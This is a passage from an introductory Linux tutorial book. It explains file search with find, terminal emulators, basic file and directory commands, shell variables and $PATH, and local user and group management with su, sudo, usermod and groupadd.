and grep are usually used, respectively. Thanks to convenient interprocess
communication tools, these two types of search are easy to combine, that is,
to search for the necessary information only in files with the necessary
attributes.

Attribute search
The main search tool for file attributes is the find program. A generalized call
to find looks like this: find path expression, where path is a list of directories
in which to search, and expression is a set of expressions that describe the
criteria for selecting files and the actions to be performed on the files found.
By default, the names of found files are simply output to standard output, but
this can be overridden and the list of names of found files can be transferred
to any command for processing. By default, find searches in all subdirectories
of directories specified in the path list.

Expressions

Expressions that define file search criteria consist of key-value pairs. Some of
the possible search options are listed below:
-amin, -anewer, -atime
The time of the last access to the file. Allows you to search for files that were
opened for a certain period of time, or vice versa, for files that nobody has
accessed for a certain period.
-cmin, -cnewer, -ctime
The time the file was last changed.
-fstype
The type of file system on which the file is located.
-gid, -group
Group that owns the file (the related -uid and -user tests match by the
owning user).
-name, -iname
Match the file name to the specified pattern.
-regex, -iregex
Match the file name to a regular expression.
-path, -ipath
Match the full file name (with the path) to the specified pattern.
-perm
Access rights.
-size
File size.
-type
File type.
Actions
The find program can perform various actions on the found files. The most
important of them are:
-print
Output the file name to the standard output (the default action);
-delete
delete a file;
-exec
execute the command by passing the file name as a parameter.
You can read about the rest in the on-screen documentation for the find
command, by issuing the man find command.

Options

Parameters affect the overall behavior of find. The most important of them
are:
-maxdepth
maximum search depth in subdirectories;
-mindepth
minimum search depth in subdirectories;
-xdev
search only within one file system (do not descend into mounted file
systems).
You can read about the rest in the on-screen documentation for the find
command.
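Putting the path, expressions, actions and options together (the project directory and file names are invented for the example):

```shell
mkdir -p project/src
echo 'hello' > project/src/a.txt
echo 'world' > project/notes.log

# search at most two levels deep for *.txt files, and for each match
# run grep via -exec; {} stands for the found file name
find project -maxdepth 2 -name '*.txt' -exec grep -l 'hello' {} \;
# prints: project/src/a.txt
```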
Terminals

The terminal in Linux is a program that provides the user with the ability to
communicate with the system using the command line interface. Terminals
allow you to transfer to the system and receive only text data from it. The
standard terminal for the Linux system can be obtained on any textual virtual
console, and in order to access the command line from the graphical shell,
special programs are needed: terminal emulators. Listed below are some of
the terminal emulators and similar programs included in the ALT Linux 2.4
Master distribution.
xterm
Programs: resize, uxterm, xterm.
Standard terminal emulator for the X Window System. This emulator is
compatible with DEC VT102 / VT220 and Tektronix 4014 terminals and is
designed for programs that do not use the graphical environment directly. If
the operating system supports window-resize notification (for example, the
SIGWINCH signal on systems derived from 4.3BSD), xterm can inform the
programs running inside it that the window size has changed.
aterm
Aterm is a color terminal emulator based on rxvt version 2.4.8, supplemented
with NeXT-style scroll bars by Alfredo Kojima. It is intended to replace
xterm when you do not need Tektronix 4014 terminal emulation.
console-tools
Programs: charset, chvt, codepage, consolechars, convkeys, deallocvt,
dumpkeys, fgconsole, setkeycodes, setleds, setmetamode, setvesablank,
showcfont, showkey, splitfont, unicode_stop, vcstime, vt-is-UTF8, writevt.
This package contains tools for loading console fonts and keyboard layouts.
It also includes a variety of fonts and layouts.
In case it is installed, its tools are used during boot / login to establish the
system / personal configuration of the console.
screen
The screen utility allows you to execute console programs when you cannot
control their execution all the time (for example, if you are limited to session
access to a remote machine).
For example, you can perform multiple interactive tasks on a single physical
terminal (remote access session) by switching between virtual terminals using
a screen installed on a remote machine. Or this program can be used to run
programs that do not require direct connection to the physical terminal.
Install the screen package if you may need virtual terminals.
vlock
The vlock program allows you to block input when working in the console.
Vlock can block the current terminal (local or remote) or the entire system of
virtual consoles, which allows you to completely block access to all consoles.
Unlocking occurs only after successful authorization of the user who initiated
the console lock.
Chapter 8 Basic Linux Shell Commands
Introduction
We are now going to look at some useful commands for file handling and
similar tasks. Before going into more detail, let's look at the Linux file
structure.
Linux stores files in a structure known as the virtual directory structure.
This is a single directory structure that incorporates all storage devices
into one tree; each storage device is represented as a file. If you
examine the path of a file, you do not see any disk information. For
instance, the path to my desktop is /home/jan/Desktop, which displays
nothing about the underlying disk. This way, you do not need to know the
underlying storage architecture.
If you add another disk to the system, you simply attach it at a mount
point directory. Everything is connected to the root.
File naming here is based on the FHS (Filesystem Hierarchy Standard).
Let’s look at the common files once more. We already went through the
directory types during the installation.
Table: Linux directory types
Directory Purpose
/ The root directory, the upper-most level of the tree.
/bin The binary store; user-level GNU utilities live here.
/boot Boot directory; files used during the boot process.
/dev Device directory and device nodes.
/etc System configuration files.
/home Home of user directories.
/lib System and application libraries.
/media Mount point for removable media such as CDs and USB drives.
/mnt Mount point for temporarily mounted file systems.
/opt Optional software packages are stored here.
/proc Process information (a virtual file system, not for user files).
/root Home directory of root.
/run Runtime data is stored here.
/sbin System binary store; administrative utilities live here.
/srv Local services store their files here.
/sys System hardware information is stored here.
/tmp This is the place for temporary files.
/usr This is where user-installed software is stored.
/var Variable directory where dynamic files such as logs are stored.

Directory and File Navigation


To view a list of directories in the present directory, in Windows you use
the dir command; this command exists on Linux as well. The most basic way to
reach a file is to use its full path, such as /home/jan/Desktop/. There are
basic commands that make this easier.

1. Know your present working directory with the pwd command.

2. Change the directory with the cd command, using the absolute path.

3. Get back to the home directory by running cd with no arguments.

Now we will use relative paths to make things easier and less time-
consuming.

Here, the dir command lists the directories under my current folder, and I
can jump to the Desktop folder with the command cd Desktop.
There are two special names when it comes to directory traversal: '.' and
'..'. A single dot represents the current directory; a double dot represents
the parent directory.

4. To go up one level, use '..'.

5. You can also use '..' to avoid typing full folder paths.
6. You can go up one level and then forward: for example, go up to
the home folder and then down into the Music folder.

7. You can chain '../' to reach a folder on an upper level, or mix
relative and absolute paths to move back and forth.
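The traversal rules above can be tried directly (demo/inner is a scratch directory created for the demonstration):

```shell
mkdir -p demo/inner    # a scratch tree for the demonstration
cd demo/inner
pwd                    # ends in .../demo/inner

cd ..                  # '..' goes up one level, into demo
cd ../demo/inner       # up again, then back down via a relative path
pwd                    # back in .../demo/inner
```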

Listing Files
We use ls command to list files. This is one of the most popular
commands among Linux users. Below is a list of ls commands and their
use.
ls -a List all files, including hidden files starting with '.'
ls --color Colored list [=always/never/auto]
ls -d List the directories themselves ('*/')
ls -F Append an indicator to entries (one of */=>@|)
ls -i List the inode index
ls -l Long-format list, including permissions
ls -la Same as above, with hidden files
ls -lh Long list in human-readable format
ls -ls Long list with file size
ls -r List in reverse order
ls -R List recursively (the directory tree)
ls -s List file sizes
ls -S Sort by size
ls -t Sort by date/time
ls -X Sort by extension name

Let’s examine a few commands. Remember, you can use more than one
argument. E.g., ls -la
Syntax: ls [option ...] [file]...
Detailed syntax:
ls [-a | --all] [-A | --almost-all] [--author] [-b | --escape]
[--block-size=size] [-B | --ignore-backups] [-c] [-C] [--color[=when]]
[-d | --directory] [-D | --dired] [-f] [-F | --classify] [--file-type]
[--format=word] [--full-time] [-g] [--group-directories-first]
[-G | --no-group] [-h | --human-readable] [--si]
[-H | --dereference-command-line] [--dereference-command-line-symlink-
to-dir] [--hide=pattern] [--indicator-style=word] [-i | --inode]
[-I | --ignore=pattern] [-k | --kibibytes] [-l] [-L | --dereference]
[-m] [-n | --numeric-uid-gid] [-N | --literal] [-o]
[-p | --indicator-style=slash] [-q | --hide-control-chars]
[--show-control-chars] [-Q | --quote-name] [--quoting-style=word]
[-r | --reverse] [-R | --recursive] [-s | --size] [-S] [--sort=word]
[--time=word] [--time-style=style] [-t] [-T | --tabsize=cols]
[-u] [-U] [-v] [-w | --width=cols] [-x] [-X] [-Z | --context] [-1]
Example: ls -l setup.py

This gives long list style details for this specific file.
More examples
List content of your home directory: ls
Lists the contents of each subdirectory: ls */
Displays directories of the current directory: ls -d */
Lists the content of root: ls /
Lists the files with the following extensions: ls *.{htm,sh,py}
Lists the details of a file, suppressing the error if it is not found: ls -l
myfile.txt 2>/dev/null
A word on /dev/null
/dev/null is an important location. It is actually a special file called the
null device; other names include the blackhole or the bit bucket.
Anything written to this file is immediately discarded, and reading from it
returns an end-of-file (EOF).
When a process or a command reports an error, STDERR (standard error) is the
default file descriptor it writes to, so the errors appear on screen. If you
want to suppress them, that is where the null device becomes handy.
We often write this redirection as > /dev/null 2>&1. For instance,
ls > /dev/null 2>&1
What do 2 and &1 mean? The file descriptor for Standard Input (stdin) is 0,
for Standard Output (stdout) it is 1, and for Standard Error (stderr) it is
2. The notation 2>&1 redirects stderr to wherever stdout points, so here
both the output and any error generated by the ls command are written to
/dev/null and discarded immediately.
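The redirection described above can be verified like this (the missing file name is deliberate, so that ls produces an error):

```shell
# The error message goes to stderr (descriptor 2) and is discarded.
ls no_such_file.txt 2>/dev/null

# Discard stdout, then point stderr (2) at wherever stdout (1) goes:
# nothing at all reaches the screen.
ls no_such_file.txt > /dev/null 2>&1
echo "no error text was printed"
```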

ls Color Codes

Image: ls color codes
These color codes distinguish the file types quite well.
Let’s run ls -lasSt

This uses a long list format, displays all files, sorts by time. Now, you need to
understand what these values are.
1. The first column (4 here) is the allocated size in blocks; the list is sorted by size.
2. In the next section d is for directory.
3. The next few characters represent permissions (r-read, w-write,
x-execute).
4. Number of hard links.
5. File owner.
6. File owner’s group.
7. Byte size.
8. Last modified time (sort by).
9. File/Directory name.
If you use -i in the command (S is removed, sorted by last modified time).
You see the nodes in the left most area.

Example: ls -laxo

Using ls for Pattern Matching


The ls command can be used in conjunction with wildcards such as ‘*’ and
‘?’ Here the ‘*’ represents multiple characters and ‘?’ represents a single
character.
In this example, we have the following folder with the following directories
and files.
We are trying to find files whose names match vm* (vm followed by any
characters). Then we will try to match the file name INSTALL with '?'
wildcards. The first attempt fails because there are only four '?'s; the
next one succeeds.
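A sketch of the wildcard matches described above, using invented file names in a scratch directory:

```shell
mkdir wild && cd wild
touch vmlinux INSTALL README

ls vm*        # '*' matches any run of characters: vmlinux
ls INSTAL?    # '?' matches exactly one character: INSTALL
# INSTALL has only three characters after INST, so four '?'s fail:
ls INST???? 2>/dev/null || echo "no match"
ls INST???   # three '?'s succeed: INSTALL
```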

We will now use the or logic to match a pattern.

Image: Folders in my directory


Let’s see if we can only list the directories with the characters a and i in
the middle.

Another example using pipes:


ls -la | less
Handling Files
In this section, we will create, modify, copy, move and delete files. You will
also learn how to read files and do other tasks.
Creating a File
To create files and to do some more tasks we use the command touch.
touch test.txt

Syntax: touch [OPTION]... FILE...


Detailed syntax: touch [[-a] [-m] | [--time=timetype] [...]] [[-d
datestring] | [-t timestamp]] [-c] [-f] [-h] [-r reffile] file [file ...]
This command can also be used to change the file access time of a file.

To change only the last access time, use -a.


Example: touch -a test1.txt

Here, to view the result you use the --time parameter with the ls command;
plain ls -l displays the last modified time, not the last access time.
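A short demonstration (notes.txt is an arbitrary name; --time=atime is the GNU ls spelling for showing access time):

```shell
touch notes.txt                # creates the file if it does not exist
touch -a notes.txt             # update only the last access time
ls -l --time=atime notes.txt   # long list showing the access time
```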
Copying Files
To copy files, use the cp command.
Syntax: cp [option]... [-T] source destination
Example: cp test1.txt test2.txt

The copy command can be dangerous because it does not ask whether test2.txt
already exists, which can lead to data loss. Therefore, always use the -i
option.

You can answer with y or n to accept or deny.


Copying a file to another directory: cp test1.txt /home/jan/Documents

Using the relative path instead of the absolute path.


Now I am at the following directory: /home/jan/Desktop. I want to copy a file
to /home/jan/Documents
Command: cp test1.txt ../Documents

Copy a file to the present working directory using the relative path. Here we
will use ‘.’ to denote the pwd.
Recursively copy files and folders
Example: cp -R copies the folder snapt with files to snipt.

Let’s copy a set of files recursively from one directory to its sub directory.
Command: cp -R ./Y/snapt/test* ./Y/snopt

This is my desktop. I have these files in the Y directory on Desktop. I want to


copy test1.txt and test2.txt from Y to snopt directory. After executing the
command,

How to use wildcards? We already used it in this example, haven’t we?
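The recursive copy above can be reproduced as follows (directory and file names taken from the example):

```shell
mkdir -p Y/snapt Y/snopt
touch Y/snapt/test1.txt Y/snapt/test2.txt

# -R descends into directories; the wildcard picks both test files
cp -R ./Y/snapt/test* ./Y/snopt
ls Y/snopt
```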

Linking Files with Hard and Symbolic Links


Another feature of the Linux file system is the ability to link files. Without
maintaining original copies of files everywhere, you can link files to keep
virtual copies of the same file. You can think of a link as a placeholder. There
are 2 types of links,
- Symbolic links
- Hard links
A symbolic link is a separate physical file that points to another file in
the file system. It is not a mere shortcut: unlike a shortcut, a symlink
gives programs transparent, instant access to the data object it points to.
Syntax: ln -s [OPTIONS] FILE LINK
Example: ln -s ./Y/test1.txt testn.txt

If you check the inode you will see these are different files. The size can tell
the same difference.
- 279185 test1.txt
- 1201056 testn.txt
When you create a symlink, the destination name should not already exist (in
particular, a directory with the symlink's target name should not be there).
However, you can force the command to create or replace the file.

The ln command is also valid for directories.

If you wish to overwrite symlinks, you have to use the -f as stated above.
Or else, if you want to replace the symlink from a file to another, use -n.
Example: I have two directories, dir1 and dir2, on my desktop. I create a
symlink from dir1 to sym. Then I want to point sym at dir2 instead. Using -s
and -f together (-sf) does not work; the option to use here is -n.
Unlinking
To remove the symlinks you can use the following commands.
- Syntax: unlink linkname
- Syntax: rm linkname
Creating Hard Links
Now we will look at creating hard links. A hard link is an additional
directory entry pointing to the same data as the original file: both names
refer to the same inode on disk.
Example: ln test1.txt hard_link
Here we do not see any symbolic representations. That means the file is an
actual physical file. And if you look at the inode, you will see both files
having the same inode number.

How do we identify a hard link? Usually the link count of a file is 1: the
file itself. If the number is 2, the file has one more hard link pointing to
the same data.
Another example,

A symbolic link does not increment the hard-link count of the file it points
to. See the following example.

What happens if the original file is removed?

Now you can see that the link count of hard_link has dropped to 1. The
symbolic link is broken, in what we call an orphan (dangling) state.

File Renaming
Next, we will look at how file renaming works. For this the command
used is mv. mv stands for “move”.
Syntax: mv [options] source dest
Example: mv LICENSE LICENSE_1
You must be cautious when you use this command. If you do the following,
what would happen?

One advantage of this command is that you can move and rename the file all
together, especially when you do it from one location to another.
Example: Moving /home/jan/Desktop/Y/snapt to the Desktop while renaming it
to Snap. This is similar to cut and paste on Windows, except for the
renaming part.
Example: mv /home/jan/Desktop/Y/snapt/ ./Snap
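A sketch of the move-and-rename in one step (paths shortened to the current directory):

```shell
mkdir -p Y/snapt
touch Y/snapt/file.txt

mv Y/snapt ./Snap   # move the directory and rename it at once
ls Snap             # file.txt travelled along
```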

Removing Files
To remove files, use the rm command. rm does not ask whether you really
want to delete the file, so you should use the -i option with it.
Syntax: rm [OPTION]... FILE...
Managing Directories
There is a set of commands to create and remove directories.
To create a directory, use the mkdir command.
To remove a directory, use the rmdir command.
Syntax: mkdir [-m=mode] [-p] [-v] [-Z=context] directory [directory ...]
rmdir [-p] [-v | –verbose] [–ignore-fail-on-non-empty] [directories …]
Example: Creating a set of directories with the mkdir command. To create a
tree of directories you must use -p. If you try without it, you won’t succeed.

Command: mkdir -p ./Dir1/Dir1_Child1/Child1_Child2

Example: rmdir ./Dir1/Dir1_Child1/Child1_Child2

To remove a directory with the rmdir command is not possible if the


directory has files in it.

You have to remove the files first in order to remove the directory. In this
case, you can use another command to do this recursively.
Example: rm -rf ./Temp
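The full create-and-remove cycle from this section, in one runnable sketch:

```shell
mkdir -p Dir1/Dir1_Child1/Child1_Child2   # -p creates the whole tree
touch Dir1/Dir1_Child1/file.txt

# rmdir only deletes empty directories, so this fails:
rmdir Dir1/Dir1_Child1 2>/dev/null || echo "rmdir refuses: not empty"

rm -rf Dir1   # recursive, forced removal deletes the whole tree
```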

Managing File Content


File content management is extremely useful for day to day work. You can
use several commands to view and manage content.
Let's look at the file command first. It lets us peek into a file and see
what it actually is. It can do more.
- This command provides an overview of the file.
- It tells you if the file is a directory.
- It tells you if the file is a symbolic link.
- It can display file properties especially against binary executables (a
secure operation).
- It may brief you about the content (i.e., when executed against a script
file).
Syntax: file [option] [filename]

Viewing Files with cat Command


The file command does not show a file's contents. To view files, use a more
versatile command known as cat.
Syntax: cat [OPTION] [FILE]...
This command is an excellent tool to view a certain file or files at once, parts
of the files and especially logs.
Example: cat test.txt
Example: Viewing 2 files together.
Command: cat test.txt testx.txt

Creating files with cat is also possible. The following command can create a
file.
Example: cat >testy
The cat command can be used with 2 familiar commands we used earlier.
The less and more commands.
Example: cat test.txt | more

Example: cat test.txt | less

Example: Displaying a line number with cat.


Command: cat -n testx.txt
Overwriting files with cat - You can use the output redirection operator
(>). The following command will overwrite the text file. This is a useful
tool, but you have to use it with caution. The same technique can combine
multiple files into a single file.
Example: cat test.txt > testx.txt
Appending file content with cat without overwriting - Since the previous
command overwrites the target, use the append operator (>>) instead when you
want to add the content of one file to the end of another.
Example: cat testx.txt >> testy.txt

Example: Using standard input with cat.


Command: cat < testy

Using head and tail commands


By default, the head command displays the first 10 lines of a file and the
tail command displays the last 10 lines.
Examples:
- head testy
- tail testy
- head -2 testy
- tail -2 testy
Chapter 9 Variables
The echo command is used to print the values stored inside variables. In
Linux, creating a variable is very easy. For example, to store the name John
in a variable called name, you can do something like this:
[root@archserver ~]# name="John"
The double quotation marks tell Linux that you are creating a variable which
will hold a string value: John. If your string contains only one word, you
can omit the quotation marks, but if you are storing a phrase of more than
one word with whitespace, then you must use the double quotation marks. To
see the value inside any variable, put a dollar sign ($) before the name of
the variable in the echo command, like this:
[root@archserver ~]# echo $name
John
If you miss the dollar sign ($), echo will treat the argument passed to it as a
string and will print that string for example:
[root@archserver ~]# echo name
name
You should keep in mind that there should not be any white spaces present
between the identifier of the variable and its value. An identifier is basically
the name or signature of a variable:
[root@archserver ~]# x=5 # This syntax is correct because there aren’t any
whitespaces
[root@archserver ~]# x = 10 # This syntax is incorrect because whitespaces
are
#present between the variable name and its value
If you want to store some value inside a file whilst using the echo command,
you could do something like this:
[root@archserver NewFolder]# echo name > new.txt
[root@archserver NewFolder]# cat new.txt
name
In the example above, I am storing a string name into a file that I created.
After storing the text in the file, I printed it on the terminal and got exactly
what I stored in the text file. In the following set of commands, I am using
double >> signs to append new text in the existing file.
[root@archserver NewFolder]# echo "is something that people use to
recognize you!" >> new.txt
[root@archserver NewFolder]# cat new.txt
name
is something that people use to recognize you!
You can also create and print two variables with a single line of command
each, respectively.
Example:
[root@archserver ~]# x=1; y=2
[root@archserver ~]# echo -e "$x\t$y"
1	2
[root@archserver ~]# echo -e "$x\n$y"
1
2
The -e flag tells echo to interpret escape characters while printing the
values of the variables. The first echo command in the example above
contains the \t escape character, which inserts a tab between the printed
values. The second echo command contains the newline escape character \n,
which prints each variable's value on its own line, as shown in the example
above.
There are other escape sequences present in Linux terminal as well. For
example, in order to print a back slash as part of your string value, you must
use double back slash in your echo command:
[root@archserver ~]# echo -e "$x\\$y"
1\2
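The rules in this chapter so far can be condensed into a short sketch:

```shell
name="John Doe"    # quotes are required because of the whitespace
echo "$name"       # $ fetches the value; without it, echo prints 'name'

x=5; y=7           # no spaces around '=' when assigning
echo -e "$x\t$y"   # tab between the values
echo -e "$x\n$y"   # each value on its own line
```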
There are other variables present in Linux too; they store values that come
in handy while using any distribution of Linux. These predefined variables
are often referred to as global variables. For example, $HOME is one of
those global variables: it stores the path of our default directory, which
in our case is the home folder of the root user. We can see the path stored
in $HOME using the echo command:
[root@archserver ~]# echo $HOME
/root
We can also change the values of these global variables, using the same
method that I used to store a value into a newly created variable. For now,
I would ask you not to try that, as this kind of change concerns expert
Linux users, which you are not right now, but soon will be. Other global
variables are:

1. PATH
2. PS1
3. TMPDIR
4. EDITOR
5. DISPLAY
Try echoing their values, but don't change them, as changes will affect the
working of your Linux installation:
[root@archserver ~]# echo $PS1
[\u@\h \W]\$
[root@archserver ~]# echo $EDITOR

[root@archserver ~]# echo $DISPLAY


:1
[root@archserver ~]# echo $TMPDIR
The most important global variable of all is $PATH. It contains the
directories where the programs you can run from any location are found.
$PATH is similar to the PATH environment variable in the Windows operating
system; both hold directory paths to programs. Let's print the $PATH
variable. Your output might differ, so don't worry if you see something
different:
Example:
[root@archserver ~]# echo $PATH
Output:
/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core
The output of the example above shows the paths where Linux looks for
executables, including directories for site_perl, vendor_perl and core_perl.
You can add values to the $PATH variable too, but again, at this stage you
shouldn't change any value present in it.
If you want to see where the commands you use reside in the Linux directory
structure, use the which command. It prints the directory from which Linux
loads the command you pass to it.
Example:
[root@archserver ~]# which ls
/usr/bin/ls

[root@archserver ~]# which pwd


/usr/bin/pwd

[root@archserver ~]# which cd


which: no cd in
(/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/cor

[root@archserver ~]# which mv


/usr/bin/mv
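A short sketch; the exact paths vary per distribution, so treat the outputs above and below as illustrative:

```shell
which ls   # e.g. /usr/bin/ls or /bin/ls
which mv

# Builtins such as cd have no file on disk, so which reports nothing.
which cd || echo "cd is a shell builtin"
```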
Chapter 10 User and Group Management
In this chapter, we will learn about users and groups in Linux and how to
manage them and administer password policies for these users. By the end of
this chapter, you will be well versed with the role of users and groups on a
Linux system and how they are interpreted by the operating system. You will
learn to create, modify, lock and delete user and group accounts, which have
been created locally. You will also learn how to manually lock accounts by
enforcing a password-aging policy in the shadow password file.
Users and Groups
In this section, we will understand what users and groups are and what is
their association with the operating system.
Who is a user?
Every process or a running program on the operating system runs as a user.
The ownership of every file lies with a user in the system. A user restricts
access to a file or a directory. Hence, if a process is running as a user, that
user will determine the files and directories the process will have access to.
You can find out the currently logged-in user by using the id command. If
you pass another username as an argument to the id command, you can retrieve
basic information about that other user as well.
If you want to know the user associated with a file or a directory, you can
use the ls -l command and the third column in the output shows the
username.
You can also view information related to processes by using the ps
command. By default, the command shows only the processes running in the
current shell. If you use the a option (ps a), you will see all processes
that have a terminal. If you wish to know the user associated with each
process, add the u option; the first column of the output will then show
the user.
The outputs that we have discussed show users by name, but the system
internally tracks users by a user ID called the UID. Usernames are mapped to
these numbers using a database in the system: a flat file stored at
/etc/passwd, which stores the information of all users. There are seven
fields for every user in this file.
username:password:UID:GID:GECOS:/home/dir:shell
username:
The username is simply a mapping of a UID to a name that humans can
remember more easily.
password:
This field is where users’ passwords used to be saved in the past; they are
now stored in a different file located at /etc/shadow.
UID:
The numeric user ID, by which the system identifies a user at the most
fundamental level.
GID:
The primary group number of the user. We will discuss groups in a while.
GECOS:
An arbitrary text field, which usually holds the full name of the user.
/home/dir:
The location of the home directory of the user, where the user keeps their
personal data and configuration files.
shell:
The program that runs after the user logs in. For a regular user, this
will mostly be the program that gives the user the command line prompt.
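The seven colon-separated fields described above are easy to pull apart with awk. Here is a minimal sketch using a made-up entry (the user alice below is illustrative, not taken from a real system):

```shell
# A sample /etc/passwd entry (hypothetical user)
entry='alice:x:1000:1000:Alice Example:/home/alice:/bin/bash'

# Split on ':' and print the username, UID, GID and shell fields
echo "$entry" | awk -F: '{print "user:", $1, "uid:", $3, "gid:", $4, "shell:", $7}'
# → user: alice uid: 1000 gid: 1000 shell: /bin/bash
```

You can run the same awk command against the real file, for example awk -F: '{print $1, $3, $7}' /etc/passwd.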
What is a group?
Just like users, groups have names and group ID (GID) numbers associated
with them. Local group information can be found in /etc/group.
There are two types of groups, primary and supplementary. Let’s understand
the features of each one by one.
Primary Group:
There is exactly one primary group for every user
The primary group of local users is defined by the fourth field
in the /etc/passwd file, where the group number GID is listed
New files created by the user are owned by the primary group
The primary group of a user by default has the same name as
that of the user. This is a User Private Group (UPG) and the
user is the only member of this group
Supplementary Group:
A user can be a member of zero or more supplementary groups
Supplementary membership for local users is defined by the last
field of the group’s entry in the /etc/group file: a comma-separated
list of the users that belong to the group
groupname:password:GID:list,of,users,in,this,group
The concept of supplementary groups is in place so that users
can be part of more groups and in turn have access to resources and
services that belong to other groups in the system
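The membership list in the fourth field of /etc/group can be split the same way. A short sketch with a hypothetical group entry:

```shell
# A sample /etc/group entry (hypothetical group and members)
entry='wheel:x:10:alice,bob,carol'

# Field 4 is the comma-separated list of supplementary members
echo "$entry" | awk -F: '{print $4}' | tr ',' '\n'
# prints alice, bob and carol on separate lines
```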
Getting Superuser Access
In this section, we will learn about what the root user is and how you can be
the root or superuser and gain full access over the system.
The root user
There is one user in every operating system that is known as the super user
and has all access and rights on that system. In a Windows based operating
system, you may have heard about the superuser known as the
administrator. In Linux based operating systems, this superuser is known
as the root user. The root user has the power to override any normal
privileges on the file system and is generally used to administer and
manage the system. If you want to perform tasks such as installing new
software or removing an existing software, and other tasks such as manage
files and directories in the system, a user will have to escalate privileges to
the root user.
Most devices on an operating system can be controlled only by the root user,
but there are a few exceptions. A normal user gets to control removable
devices such as a USB drive. A non-root user can, therefore, manage and
remove files on a removable device but if you want to make modifications to
a fixed hard drive, that would only be possible for a root user.
But as we have heard, with great power comes great responsibility. Given the
unlimited powers that the root user has, those powers can be used to damage
the system as well. A root user can delete files and directories, remove or
modify user accounts, create backdoors in the system, etc. Someone else can
gain full control over the system if the root user account gets compromised.
Therefore, it is always advisable that you login as a normal user and escalate
privileges to the root user only when absolutely required.
The root account on Linux operating system is the equivalent of the local
Administrator account on Windows operating systems. It is a practice in
Linux to login as a regular user and then use tools to gain certain privileges of
the root account.
Using Su to Switch Users
You can switch to a different user account in Linux using the su
command. If you do not pass a username as an argument to the su
command, it is implied that you want to switch to the root user account. If
you are invoking the command as a regular user, you will be prompted to
enter the password of the account that you want to switch to. However, if
you invoke the command as a root user, you will not need to enter the
password of the account that you are switching to.
su - <username>
[student@desktop ~]$ su -
Password: rootpassword
[root@desktop ~]#
If you use the command su username, it will start a session in a non-login
shell. But if you use the command as su - username, there will be a login
shell initiated for the user. This means that using su - username sets up a new
and clean login for the new user whereas just using su username will retain
all the current settings of the current shell. Mostly, to get the new user’s
default settings, administrators usually use the su - command.

sudo and the root


There is a very strict model implemented in Linux operating systems for users:
the root user has the power to do everything, while the other users can do
nothing that is related to the system. The common solution followed in the
past was to allow a normal user to become the root user using the su command
for a temporary period until the required task was completed. This, however,
has the disadvantage that a regular user literally becomes the root user and
gains all of root’s powers. They could then make critical changes to the
system, like restarting it, or even delete an entire directory like /etc.
There is another issue too: every user switching to the root user would need
to know the root password, which is not a very good idea.
This is where the sudo command comes into the picture. The sudo
command lets a regular user run commands as if they were the root user, or
another user, as per the settings defined in the /etc/sudoers file. While
other tools like su require you to know the password of the root user, the
sudo command requires only your own password for authentication, not the
password of the account you are trying to gain access to. This allows the
administrator of the system to grant a limited list of privileges to regular
users so that they can perform system administration tasks without ever
needing to know the root password.
Let us see an example where the student user has been granted access
through sudo to run the usermod command. With this access, the student
user can now modify any other user account and lock that account.
[student@desktop ~]$ sudo usermod -L username
[sudo] password for student: studentpassword
Another benefit of using the sudo access is that all commands that any
user runs using sudo are logged to /var/log/secure.
Managing User Accounts
In this section, you will learn how to create, modify, lock and delete user
accounts that are defined locally in the system. There are a lot of tools
available on the command line, which can be invoked to manage local user
accounts. Let us go through them one by one and understand what they do.
useradd username is a command that creates a new user with the specified
username and fills in default parameters for the user in the /etc/passwd
file when run without options. However, the command does not set any
password for the new user, so the user will not be able to log in until a
password has been set.
The useradd --help will give you a list of options that can be specified for
the useradd command and using these will override the default parameters
of the user in the /etc/passwd file. For a few options, you can also use the
usermod command to modify existing users.
There are certain parameters for the user, such as the password aging
policy or the range of the UID numbers, which will be read from the
/etc/login.defs file. This file comes into play only when creating new
users; modifying it will not change existing users on the system.
● usermod --help will display all the basic options that you can use with
this command to manage user accounts. Let us go through these in brief:
-c, --comment COMMENT  Add a value, such as the full name, to the GECOS field
-g, --gid GROUP  Specify the primary group of the user
-G, --groups GROUPS  Associate one or more supplementary groups with the user
-a, --append  Used with the -G option to add the user to the specified
supplementary groups without removing the user from other groups
-d, --home HOME_DIR  Specify a new home directory for the user
-m, --move-home  Move the user’s home directory to the new location given
with the -d option
-s, --shell SHELL  Change the login shell of the user
-L, --lock  Lock the user account
-U, --unlock  Unlock the user account
● userdel username deletes the user from the /etc/passwd file but does not
delete the home directory of that user.
userdel -r username deletes the user from /etc/passwd and deletes their home
directory along with its content as well.
● id displays the user details of the current user, which includes the UID
of the user and group memberships.
id username will display the details of the user specified, which includes the
UID of the user and group memberships.
● passwd username is a command that can be used to set the user’s initial
password or modify the user’s existing password.
The root user has the power to set the password to any value. If the criteria
for password strength are not met, a warning message will appear, but the
root user can retype the same password and set it for a given user anyway.
A regular user, on the other hand, must select a password that is at least 8
characters long and is not the same as the username, a previous password, or
a word that can be found in the dictionary.
● UID Ranges are ranges that are reserved for specific purposes in
Red Hat Enterprise Linux 7:
UID 0 is always assigned to the root user.
UID 1-200 are statically assigned by the system to system processes.
UID 201-999 are assigned to system processes that do not own files in the
system. They are dynamically assigned whenever installed software requests
a process.
UID 1000+ are assigned to regular users of the system.
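You can check the first of these rules directly with the id command, which works without root privileges:

```shell
# root always has UID 0
id -u root               # → 0

# Your own UID; on most systems a regular account falls in the
# 1000+ range
id -u
```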
Managing Group Accounts
In this section, we will learn about how to create, modify, and delete group
accounts that have been created locally.
It is important that the group already exists before you can add users to a
group. There are many tools available on the Linux command line that will
help you to manage local groups. Let us go through these commands used for
groups one by one.
● groupadd groupname is a command that, if used without any options,
creates a new group and assigns it the next available GID from the group
range defined in the /etc/login.defs file.
You can specify a GID by using the option -g GID
[student@desktop ~]$ sudo groupadd -g 5000 ateam
The -r option will create a group that is system specific and assign it a
GID belonging to the system range, which is defined in the /etc/login.defs
file.
[student@desktop ~]$ sudo groupadd -r professors
● groupmod command is used to modify the parameters of an existing
group such as changing the mapping of the groupname to the GID. The -n
option is used to specify a new name to the group.
[student@desktop ~]$ sudo groupmod -n professors lecturers
The -g option is passed along with the command if you want to assign a
new GID to the group.
[student@desktop ~]$ sudo groupmod -g 6000 ateam

● groupdel command is used to delete a group.
[student@desktop ~]$ sudo groupdel ateam
groupdel will not work on a group that is the primary group of a user.
Just like with userdel, be careful with groupdel: check that no files on
the system are still owned by the group after deleting it.
● usermod command is also used to modify a user’s group membership. You
can change a user’s primary group with the command usermod -g groupname
username.
[student@desktop ~]$ sudo usermod -g student student
You can add a user to the supplementary group using the usermod -aG
groupname username command.
